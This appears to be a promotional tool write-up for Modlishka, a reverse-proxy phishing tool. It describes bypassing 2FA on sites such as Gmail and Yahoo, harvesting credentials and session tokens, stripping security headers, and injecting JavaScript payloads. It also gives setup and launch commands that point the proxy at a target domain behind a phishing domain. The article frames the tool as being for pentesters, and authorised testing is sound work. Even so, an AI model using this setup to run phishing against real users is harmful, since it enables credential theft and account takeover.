Modlishka is a very powerful Reverse Proxy tool that allows you to run phishing campaigns. It can be very useful to all pentesters since Modlishka is able to show current 2FA weaknesses (bypass 2FA protection on popular websites: Gmail, Yahoo, etc.) and help you find and implement adequate security solutions.
Modlishka: Powerful Reverse Proxy, Phishing NG, Bypassing 2FA
Modlishka is written in
Go and it allows you to carry out an effective phishing campaign. In addition, according to the official docu, you can adjust the configuration for your chosen domain. This reverse proxy tool can be easily customized through a set of available command line options or JSON configuration files.
Modlishka tool is able to trick 2FA systems by collectiing 2FA tokens, without using fake templates (you just need to point to the target domain). To start pentesting/ phishing with Modlishka, all you need is TLS certificate and phishing domain.
- Support for majority of 2FA authentication schemes (by design).
- No website templates (just point Modlishka to the target domain – in most cases, it will be handled automatically).
- Full control of “cross” origin TLS traffic flow from your victims browsers (through custom new techniques).
- Flexible and easily configurable phishing scenarios through configuration options.
- Striping website from all encryption and security headers (back to 90’s MITM style).
- User credential harvesting (with context based on URL parameter passed identifiers).
- Can be extended with your ideas through plugins.
- Stateless design. Can be scaled up easily for an arbitrary number of users – ex. through a DNS load balancer.
- Web panel with a summary of collected credentials and user session impersonation (beta).
- Backdoor free.
Prerequisites (to run an effective phishing campaign):
- Registered domain name
- Wildcard SSL certificate
First of all, you need to fetch the source code with
$ go get -u github.com/drk1wi/Modlishka
Then configure the
$ openssl genrsa -out MyRootCA.key 2048`
$ openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem
- Replace the const
CA_CERTvariable with the content of
MyRootCA.pemfile and const
CA_CERT_KEYwith the content of
- Install and set the right trust level for the ‘MyRootCA’ (MyRootCA.pem file) CA in your browsers certificate store (Firefox, Chrome).
Finally, compile and launch:
$ sudo ./dist/proxy -config templates/google.com_gsuite.json
To list available options, simply use
Usage of ./dist/proxy:
base64 encoded TLS certificate
base64 encoded TLS certificate key
base64 encoded Certification Authority certificate
JSON configuration file. Convenient instead of using command line switches.
Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)
Print debug information
Disable security features like anti-SSRF. Disable at your own risk.
Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
Listening address (default "127.0.0.1")
Listening port (default "443")
Local file to which fetched requests will be written (appended)
Phishing domain to create - Ex.: target.co
$ sudo ./dist/proxy -target https://target-domain.com -phishingDomain loopback.modlishka.io -listeningPort 80
The following command will launch the proxy without any encryption:
Targetparameter : the domain that should be proxied,
phishingDomain: defines the phishing domain.
DEMO: Phishing with Modlishka (author: @drk1wi)
For more detailed usage guide, click on the “documentation” button below.